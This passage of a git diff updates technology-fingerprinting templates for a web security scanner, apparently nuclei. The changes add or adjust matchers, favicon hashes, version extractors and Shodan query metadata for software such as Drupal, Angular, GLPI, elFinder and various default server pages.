@@ -17,10 +17,10 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
-        condition: or
         words:
           - 'Error ConnectYourDomain occurred'
           - 'wixErrorPagesApp'
+        condition: and
 
       - type: status
         status:
diff --git a/technologies/aem-detection.yaml b/technologies/aem-detection.yaml
index 882cca92b6..bb3d7e0753 100644
--- a/technologies/aem-detection.yaml
+++ b/technologies/aem-detection.yaml
@@ -12,7 +12,7 @@ info:
     - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
   metadata:
     shodan-query: http.component:"Adobe Experience Manager"
-  tags: aem,favicon,tech
+  tags: aem,favicon,tech,adobe
 
 requests:
   - method: GET
@@ -25,4 +25,4 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
\ No newline at end of file
+          - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
diff --git a/technologies/angular-detect.yaml b/technologies/angular-detect.yaml
new file mode 100644
index 0000000000..eb4ff9dc50
--- /dev/null
+++ b/technologies/angular-detect.yaml
@@ -0,0 +1,32 @@
+id: angular-detect
+
+info:
+  name: Angular detect
+  author: TechbrunchFR
+  severity: info
+  description: Angular is a development platform for building mobile and desktop web applications using Typescript/JavaScript and other languages.
+  reference:
+    - https://github.com/angular/angular
+  metadata:
+    verified: true
+    shodan-query: html:"ng-version="
+  tags: technology,angular
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+
+    matchers:
+      - part: body
+        type: word
+        words:
+          - "ng-version="
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - 'ng-version="([0-9.]+)"'
diff --git a/technologies/apache/default-apache-test-page.yaml b/technologies/apache/default-apache-test-page.yaml
index d76fd5ac60..ade74d648c 100644
--- a/technologies/apache/default-apache-test-page.yaml
+++ b/technologies/apache/default-apache-test-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Apache HTTP Server Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22
+  metadata:
+    shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS"
   tags: tech,apache
 
 requests:
diff --git a/technologies/apache/default-apache2-page.yaml b/technologies/apache/default-apache2-page.yaml
index a123e40b22..2f32e210bc 100644
--- a/technologies/apache/default-apache2-page.yaml
+++ b/technologies/apache/default-apache2-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Apache2 Default Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22
+  metadata:
+    shodan-query: http.title:"Apache2 Debian Default Page:"
   tags: tech,apache
 
 requests:
diff --git a/technologies/apache/default-apache2-ubuntu-page.yaml b/technologies/apache/default-apache2-ubuntu-page.yaml
index 61ba9b8c68..83b392e20a 100644
--- a/technologies/apache/default-apache2-ubuntu-page.yaml
+++ b/technologies/apache/default-apache2-ubuntu-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Apache2 Ubuntu Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Apache2+Ubuntu+Default+Page%22
+  metadata:
+    shodan-query: http.title:"Apache2 Ubuntu Default Page"
   tags: tech,apache
 
 requests:
diff --git a/technologies/apache/ranger-detection.yaml b/technologies/apache/ranger-detection.yaml
index d299f2c75d..abe004645c 100644
--- a/technologies/apache/ranger-detection.yaml
+++ b/technologies/apache/ranger-detection.yaml
@@ -1,29 +1,29 @@
-id: ranger-detection
+id: ranger-detection
 
-info:
-  name: Apache Ranger Detection
-  author: For3stCo1d
-  severity: info
-  tags: tech,apache,ranger
-  metadata:
-    shodan-query: http.title:"Ranger - Sign In"
-  reference: https://github.com/apache/ranger
+info:
+  name: Apache Ranger Detection
+  author: For3stCo1d
+  severity: info
+  tags: tech,apache,ranger
+  metadata:
+    shodan-query: http.title:"Ranger - Sign In"
+  reference: https://github.com/apache/ranger
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/login.jsp'
-      - "{{BaseURL}}/images/favicon.ico"
-
-    stop-at-first-match: true
-    matchers-condition: or
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<title> Ranger - Sign In</title>"
-
-      - type: dsl
-        name: favicon
-        dsl:
-          - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))"
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login.jsp'
+      - "{{BaseURL}}/images/favicon.ico"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title> Ranger - Sign In</title>"
+
+      - type: dsl
+        name: favicon
+        dsl:
+          - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))"
diff --git a/technologies/apache/xampp-default-page.yaml b/technologies/apache/xampp-default-page.yaml
index 1319d9342e..8a4eda7628 100644
--- a/technologies/apache/xampp-default-page.yaml
+++ b/technologies/apache/xampp-default-page.yaml
@@ -4,8 +4,8 @@ info:
   name: XAMPP Default Page
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22XAMPP%22&page=1
+  metadata:
+    shodan-query: http.title:"XAMPP"
   tags: tech,php,xampp,apache
 
 requests:
diff --git a/technologies/appcms-detect.yaml b/technologies/appcms-detect.yaml
index bc2b1aa95a..6943311954 100644
--- a/technologies/appcms-detect.yaml
+++ b/technologies/appcms-detect.yaml
@@ -4,6 +4,8 @@ info:
   name: AppCms Detect
   author: princechaddha
   severity: info
+  metadata:
+    shodan-query: http.html:"Powerd by AppCMS"
   tags: tech,appcms
 
 requests:
diff --git a/technologies/autobahn-python-detect.yaml b/technologies/autobahn-python-detect.yaml
index f4c7929bc7..7a9bc0b55d 100644
--- a/technologies/autobahn-python-detect.yaml
+++ b/technologies/autobahn-python-detect.yaml
@@ -4,8 +4,8 @@ info:
   name: Autobahn-Python Webserver Detect
   author: pussycat0x
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=%22AutobahnPython%22
+  metadata:
+    shodan-query: "AutobahnPython"
   tags: tech,webserver
 
 requests:
diff --git a/technologies/avideo-detect.yaml b/technologies/avideo-detect.yaml
new file mode 100644
index 0000000000..5b375890c3
--- /dev/null
+++ b/technologies/avideo-detect.yaml
@@ -0,0 +1,37 @@
+id: avideo-detect
+
+info:
+  name: Avideo Detect
+  author: pikpikcu
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"AVideo"
+    fofa-query: "AVideo"
+  tags: tech,avideo
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<title>(.*)AVideo(.*)</title>'
+          - 'AVideo Analytics'
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "/install/index.php"
+        negative: true
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/aws-elastic-beanstalk-detect.yaml b/technologies/aws-elastic-beanstalk-detect.yaml
index 9c88c7b2ae..532f1b9aee 100644
--- a/technologies/aws-elastic-beanstalk-detect.yaml
+++ b/technologies/aws-elastic-beanstalk-detect.yaml
@@ -1,31 +1,31 @@
-id: elastic-beanstalk-detect
+id: elastic-beanstalk-detect
 
-info:
-  name: AWS Elastic Beanstalk Detect
-  author: pussycat0x
-  severity: info
-  tags: aws,tech,beanstalk
+info:
+  name: AWS Elastic Beanstalk Detect
+  author: pussycat0x
+  severity: info
+  tags: aws,tech,beanstalk
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<li><a href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic Beanstalk overview</a></li>'
-          - '<li><a href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk overview</a></li>'
-        condition: or
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - '<title>([A-Za-z -]+)<\/title>'
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<li><a href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic Beanstalk overview</a></li>'
+          - '<li><a href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk overview</a></li>'
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<title>([A-Za-z -]+)<\/title>'
diff --git a/technologies/aws/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml
index 643596813d..fb12d1953b 100644
--- a/technologies/aws/aws-bucket-service.yaml
+++ b/technologies/aws/aws-bucket-service.yaml
@@ -19,11 +19,9 @@ requests:
           - contains(tolower(all_headers), 'x-amz-request')
           - contains(tolower(all_headers), 'x-amz-id')
           - contains(tolower(all_headers), 'amazons3')
-        part: header
         condition: or
 
       - type: dsl
         dsl:
           - contains(tolower(all_headers), 'x-guploader-uploadid')
-        part: header
         negative: true
diff --git a/technologies/cloudfoundry-detect.yaml b/technologies/cloudfoundry-detect.yaml
new file mode 100644
index 0000000000..adac87c0bd
--- /dev/null
+++ b/technologies/cloudfoundry-detect.yaml
@@ -0,0 +1,28 @@
+id: cloudfoundry-detect
+
+info:
+  name: Cloudfoundry Detect
+  author: uomogrande
+  severity: info
+  description: Detects cloudfoundry based on response headers
+  reference: https://docs.cloudfoundry.org/concepts/cf-routing-architecture.html
+  tags: cloudfoundry,tech
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      # request unknown (random) route
+      - |
+        GET / HTTP/1.1
+        Host: {{randstr}}.com
+
+    stop-at-first-match: true
+    req-condition: true
+    matchers:
+
+      - type: dsl
+        dsl:
+          - 'contains(all_headers, "X-Vcap-Request-Id:") || contains(all_headers, "X-Cf-Routererror:")'
diff --git a/technologies/confluence-detect.yaml b/technologies/confluence-detect.yaml
index 0e17bc5ab9..b860a53f8f 100644
--- a/technologies/confluence-detect.yaml
+++ b/technologies/confluence-detect.yaml
@@ -37,4 +37,5 @@ requests:
         part: body
         group: 1
         regex:
-          - 'Atlassian Confluence ([a-z0-9-._]+)'
+          - '<meta name="ajs-version-number" content="(.*)">'
+          - 'Atlassian Confluence ([a-z0-9-._]+)'
\ No newline at end of file
diff --git a/technologies/default-asp-net-page.yaml b/technologies/default-asp-net-page.yaml
index b8fa43a4c5..14b19fd93c 100644
--- a/technologies/default-asp-net-page.yaml
+++ b/technologies/default-asp-net-page.yaml
@@ -4,8 +4,8 @@ info:
   name: ASP.Net Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Home+Page+-+My+ASP.NET+Application%22
+  metadata:
+    shodan-query: http.title:"Home Page - My ASP.NET Application"
   tags: tech,asp
 
 requests:
diff --git a/technologies/default-centos-test-page.yaml b/technologies/default-centos-test-page.yaml
index 24e89abe3e..fb57940f33 100644
--- a/technologies/default-centos-test-page.yaml
+++ b/technologies/default-centos-test-page.yaml
@@ -4,14 +4,15 @@ info:
   name: CentOs-WebPanel Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22HTTP+Server+Test+Page+powered+by+CentOS-WebPanel.com%22
+  metadata:
+    shodan-query: http.title:"HTTP Server Test Page powered by CentOS-WebPanel.com"
   tags: tech,centos
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-codeigniter-page.yaml b/technologies/default-codeigniter-page.yaml
index 590ea854ec..6a871e0552 100644
--- a/technologies/default-codeigniter-page.yaml
+++ b/technologies/default-codeigniter-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Default CodeIgniter Page
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+CodeIgniter%22
+  metadata:
+    shodan-query: http.title:"Welcome to CodeIgniter"
   tags: tech,codeigniter
 
 requests:
diff --git a/technologies/default-django-page.yaml b/technologies/default-django-page.yaml
index 69543a783e..474a3541a5 100644
--- a/technologies/default-django-page.yaml
+++ b/technologies/default-django-page.yaml
@@ -4,14 +4,15 @@ info:
   name: Django Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22The+install+worked+successfully%21+Congratulations%21%22
+  metadata:
+    shodan-query: http.title:"The install worked successfully! Congratulations!"
   tags: tech,django
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-fastcgi-page.yaml b/technologies/default-fastcgi-page.yaml
index afc17463fe..043d7a67a9 100644
--- a/technologies/default-fastcgi-page.yaml
+++ b/technologies/default-fastcgi-page.yaml
@@ -4,14 +4,15 @@ info:
   name: Fastcgi Default Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22FastCGI%22
+  metadata:
+    shodan-query: http.title:"FastCGI"
   tags: tech,fastcgi
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-fedora-page.yaml b/technologies/default-fedora-page.yaml
index 9ba13abe80..5590ed4e20 100644
--- a/technologies/default-fedora-page.yaml
+++ b/technologies/default-fedora-page.yaml
@@ -4,14 +4,15 @@ info:
   name: Fedora Default Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+HTTP+Server+on+Fedora%22
+  metadata:
+    shodan-query: http.title:"Test Page for the HTTP Server on Fedora"
   tags: tech,fedora
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-glassfish-server-page.yaml b/technologies/default-glassfish-server-page.yaml
index c35faab8aa..9baccc7473 100644
--- a/technologies/default-glassfish-server-page.yaml
+++ b/technologies/default-glassfish-server-page.yaml
@@ -4,14 +4,15 @@ info:
   name: GlassFish Server Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22GlassFish+Server+-+Server+Running%22
+  metadata:
+    shodan-query: http.title:"GlassFish Server - Server Running"
   tags: tech,glassfish
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-jetty-page.yaml b/technologies/default-jetty-page.yaml
index 14eb5e57a1..805a2c52d1 100644
--- a/technologies/default-jetty-page.yaml
+++ b/technologies/default-jetty-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Jetty Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Powered+By+Jetty%22
+  metadata:
+    shodan-query: http.title:"Powered By Jetty"
   tags: tech,jetty
 
 requests:
diff --git a/technologies/default-lighttpd-page.yaml b/technologies/default-lighttpd-page.yaml
index e7e578eb16..0e1f81b53e 100644
--- a/technologies/default-lighttpd-page.yaml
+++ b/technologies/default-lighttpd-page.yaml
@@ -4,8 +4,8 @@ info:
   name: lighttpd Default Page
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22
+  metadata:
+    shodan-query: http.title:"Powered by lighttpd"
   tags: tech,lighttpd
 
 requests:
diff --git a/technologies/default-lucee-page.yaml b/technologies/default-lucee-page.yaml
index 711823d0a6..dca69734eb 100644
--- a/technologies/default-lucee-page.yaml
+++ b/technologies/default-lucee-page.yaml
@@ -4,14 +4,15 @@ info:
   name: Lucee Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Lucee%22
+  metadata:
+    shodan-query: http.title:"Lucee"
   tags: tech,lucee
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-openresty.yaml b/technologies/default-openresty.yaml
index 987668bb6e..d70699cc1a 100644
--- a/technologies/default-openresty.yaml
+++ b/technologies/default-openresty.yaml
@@ -4,14 +4,15 @@ info:
   name: OpenResty Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22
+  metadata:
+    shodan-query: http.title:"Welcome to OpenResty!"
   tags: tech,openresty
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-page-azure-container.yaml b/technologies/default-page-azure-container.yaml
new file mode 100644
index 0000000000..bb06677500
--- /dev/null
+++ b/technologies/default-page-azure-container.yaml
@@ -0,0 +1,25 @@
+id: default-page-azure-container
+
+info:
+  name: Azure Container Instance Default Page
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Welcome to Azure Container Instances!"
+  tags: tech,azure,cloud
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Welcome to Azure Container Instances!</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/default-parallels-plesk.yaml b/technologies/default-parallels-plesk.yaml
new file mode 100644
index 0000000000..4a832e5759
--- /dev/null
+++ b/technologies/default-parallels-plesk.yaml
@@ -0,0 +1,26 @@
+id: default-parallels-plesk
+
+info:
+  name: Default Parallels Plesk Panel Page
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"Default Parallels Plesk Panel Page"
+  tags: tech,default-page,parallels,plesk
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Default Parallels Plesk Panel Page</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/default-payara-server-page.yaml b/technologies/default-payara-server-page.yaml
index 90bdf3bcac..4908cc038a 100644
--- a/technologies/default-payara-server-page.yaml
+++ b/technologies/default-payara-server-page.yaml
@@ -4,14 +4,15 @@ info:
   name: Payara Server Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Payara+Server+-+Server+Running%22
+  metadata:
+    shodan-query: http.title:"Payara Server - Server Running"
   tags: tech,payara
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-plesk-page.yaml b/technologies/default-plesk-page.yaml
index 0d8343e45d..14960af539 100644
--- a/technologies/default-plesk-page.yaml
+++ b/technologies/default-plesk-page.yaml
@@ -4,14 +4,15 @@ info:
   name: Plesk Default Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Web+Server%27s+Default+Page%22
+  metadata:
+    shodan-query: http.title:"Web Server's Default Page"
   tags: tech,plesk
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-redhat-test-page.yaml b/technologies/default-redhat-test-page.yaml
index ca4854a104..5418a93761 100644
--- a/technologies/default-redhat-test-page.yaml
+++ b/technologies/default-redhat-test-page.yaml
@@ -4,14 +4,15 @@ info:
   name: Red Hat Enterprise Linux Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+Apache+HTTP+Server+on+Red+Hat+Enterprise+Linux%22
+  metadata:
+    shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux"
   tags: tech,redhat
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-ssltls-test-page.yaml b/technologies/default-ssltls-test-page.yaml
index 74d5f3f999..8b808b0f00 100644
--- a/technologies/default-ssltls-test-page.yaml
+++ b/technologies/default-ssltls-test-page.yaml
@@ -4,14 +4,15 @@ info:
   name: SSL/TLS-aware Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+SSL%2FTLS-aware+Apache+Installation+on+Web+Site%22&page=2
+  metadata:
+    shodan-query: http.title:"Test Page for the SSL/TLS-aware Apache Installation on Web Site"
   tags: tech,ssltls
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/technologies/default-websphere-liberty.yaml b/technologies/default-websphere-liberty.yaml
new file mode 100644
index 0000000000..386fa73002
--- /dev/null
+++ b/technologies/default-websphere-liberty.yaml
@@ -0,0 +1,32 @@
+id: default-websphere-liberty
+
+info:
+  name: WebSphere Liberty Default Page
+  author: oppsec
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"WebSphere Liberty"
+  tags: tech,websphere,liberty
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "WebSphere Liberty"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(WebSphere Liberty).*?([a-zA-Z0-9.-]+)"
diff --git a/technologies/detect-sentry.yaml b/technologies/detect-sentry.yaml
index 1150805076..c5a3c6c863 100644
--- a/technologies/detect-sentry.yaml
+++ b/technologies/detect-sentry.yaml
@@ -7,7 +7,7 @@ info:
   reference:
     - https://hackerone.com/reports/374737
     - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
-  tags: ssrf,sentry,tech
+  tags: ssrf,sentry,tech,hackerone
 
 requests:
   - method: GET
diff --git a/technologies/drupal-detect.yaml b/technologies/drupal-detect.yaml
new file mode 100644
index 0000000000..a18468af40
--- /dev/null
+++ b/technologies/drupal-detect.yaml
@@ -0,0 +1,30 @@
+id: drupal-detect
+
+info:
+  name: Drupal Detection
+  author: 1nf1n7y
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.component:"Drupal"
+  tags: tech,drupal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/CHANGELOG.txt"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Initial release'
+          - 'Drupal 1.0.0'
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - 'content="Drupal'
diff --git a/technologies/dwr-index-detect.yaml b/technologies/dwr-index-detect.yaml
index 1edd6614b4..9de9c318f8 100644
--- a/technologies/dwr-index-detect.yaml
+++ b/technologies/dwr-index-detect.yaml
@@ -9,7 +9,7 @@ info:
   reference:
     - http://aetherlab.net/2012/09/experiences-in-pentesting-dwr/
   metadata:
-    google-dork: intitle:"DWR Test Index"
+    google-query: intitle:"DWR Test Index"
   tags: tech,misconfig,dwr
 
 requests:
diff --git a/technologies/elasticsearch-sql-client-detect.yaml b/technologies/elasticsearch-sql-client-detect.yaml
index b6efdc2579..0522884878 100644
--- a/technologies/elasticsearch-sql-client-detect.yaml
+++ b/technologies/elasticsearch-sql-client-detect.yaml
@@ -1,24 +1,25 @@
-id: elasticsearch-sql-client-detect
+id: elasticsearch-sql-client-detect
 
-info:
-  name: Elasticsearch SQL Client Detect
-  author: pussycat0x
-  severity: low
-  reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
-  tags: elasticsearch,tech,sql
+info:
+  name: Elasticsearch SQL Client Detect
+  author: pussycat0x
+  severity: low
+  metadata:
+    shodan-query: http.title:"Elasticsearch-sql client"
+  tags: elasticsearch,tech,sql
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Elasticsearch-sql client</title>'
-        part: body
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Elasticsearch-sql client</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/elfinder-detect.yaml b/technologies/elfinder-detect.yaml
index 4b2dbbccc8..f17f947c6f 100644
--- a/technologies/elfinder-detect.yaml
+++ b/technologies/elfinder-detect.yaml
@@ -1,9 +1,13 @@
 id: elfinder-detect
 
 info:
-  name: elFinder Detect
+  name: elFinder - Install Detection
   author: pikpikcu
+  description: An elFinder implementation was discovered.
   severity: info
+  classification:
+    cvss-score: 0.0
+    cwe-id: CWE-200
   tags: tech,elfinder
 
 requests:
@@ -24,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/technologies/elfinder-version.yaml b/technologies/elfinder-version.yaml
index e83b34783c..a4f20d896a 100644
--- a/technologies/elfinder-version.yaml
+++ b/technologies/elfinder-version.yaml
@@ -1,13 +1,17 @@
 id: elfinder-version
 
 info:
-  name: elFinder version extractor
+  name: elFinder 2.1.58 - Remote Code Execution
   author: idealphase
-  severity: info
-  description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary
-    code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
+  severity: critical
+  description: elFinder 2.1.58 is vulnerable to remote code execution. This can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration.
+  remediation: The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
   reference:
     - https://github.com/Studio-42/elFinder/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: tech,elfinder,oss
 
 requests:
@@ -35,3 +39,5 @@ requests:
         regex:
           - '\* Version (.+) \('
           - "elFinder.prototype.version = '([0-9.]+)';"
+
+# Enhanced by mp on 2022/07/22
diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml
index 9811f35c36..db559abf1a 100644
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml
@@ -2605,3 +2605,33 @@ requests:
         name: "Kubernetes-Operational-View"
         dsl:
           - "status_code==200 && (\"2130463260\" == mmh3(base64_py(body)))"
+
+      - type: dsl
+        name: "Rancher"
+        dsl:
+          - "status_code==200 && (\"464587962\" == mmh3(base64_py(body)))"
+
+      - type: dsl
+        name: "Emby"
+        dsl:
+          - "status_code==200 && (\"902188936\" == mmh3(base64_py(body)))"
+
+      - type: dsl
+        name: "Zimbra"
+        dsl:
+          - "status_code==200 && (\"1624375939\" == mmh3(base64_py(body)))"
+
+      - type: dsl
+        name: "ICT Protege WX"
+        dsl:
+          - "status_code==200 && (\"1841044852\" == mmh3(base64_py(body)))"
+
+      - type: dsl
+        name: "Coverity"
+        dsl:
+          - "status_code==200 && (\"-994319624\" == mmh3(base64_py(body)))"
+
+      - type: dsl
+        name: "Aqua Enterprise"
+        dsl:
+          - "status_code==200 && (\"-1261322577\" == mmh3(base64_py(body)))"
diff --git a/technologies/glpi-project-detect.yaml b/technologies/glpi-project-detect.yaml
new file mode 100644
index 0000000000..5b9054ec9b
--- /dev/null
+++ b/technologies/glpi-project-detect.yaml
@@ -0,0 +1,39 @@
+id: glpi-project-detect
+
+info:
+  name: GLPI Detect
+  author: ricardomaia
+  severity: info
+  reference:
+    - https://glpi-project.org/
+  metadata:
+    verified: true
+    shodan-query: title:"glpi"
+  tags: tech,glpi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/CHANGELOG.md"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - "GLPI changes"
+          - "glpi-project.org"
+        condition: and
+
+      - type: regex
+        regex:
+          - '(GLPI.*[C|c]opyright.*(|Teclib))'
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '# GLPI changes\n\n.*\n.*\n.*\n##\s\[(\d+\.\d+|\d+\.\d+\.\d+)\]'
diff --git a/technologies/google/google-bucket-service.yaml b/technologies/google/google-bucket-service.yaml
index 26feaa908c..571cb5e7f1 100644
--- a/technologies/google/google-bucket-service.yaml
+++ b/technologies/google/google-bucket-service.yaml
@@ -21,5 +21,4 @@ requests:
           - contains(tolower(all_headers), 'x-goog-stored-content-encoding')
           - contains(tolower(all_headers), 'x-goog-stored-content-length')
           - contains(tolower(all_headers), 'x-guploader-uploadid')
-        part: header
         condition: or
diff --git a/technologies/hashicorp-boundary-detect.yaml b/technologies/hashicorp-boundary-detect.yaml
new file mode 100644
index 0000000000..6a5025fb68
--- /dev/null
+++ b/technologies/hashicorp-boundary-detect.yaml
@@ -0,0 +1,19 @@
+id: hashicorp-boundary-detect
+
+info:
+  name: HashiCorp Boundary Detect
+  author: codexlynx
+  severity: info
+  description: Detects HashiCorp Boundary
+  tags: tech,hashicorp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'HashiCorp Boundary'
diff --git a/technologies/hp-blade-admin-detect.yaml b/technologies/hp-blade-admin-detect.yaml
index cd397e7acd..dd20eed05f 100644
--- a/technologies/hp-blade-admin-detect.yaml
+++ b/technologies/hp-blade-admin-detect.yaml
@@ -1,24 +1,24 @@
-id: hp-blade-system
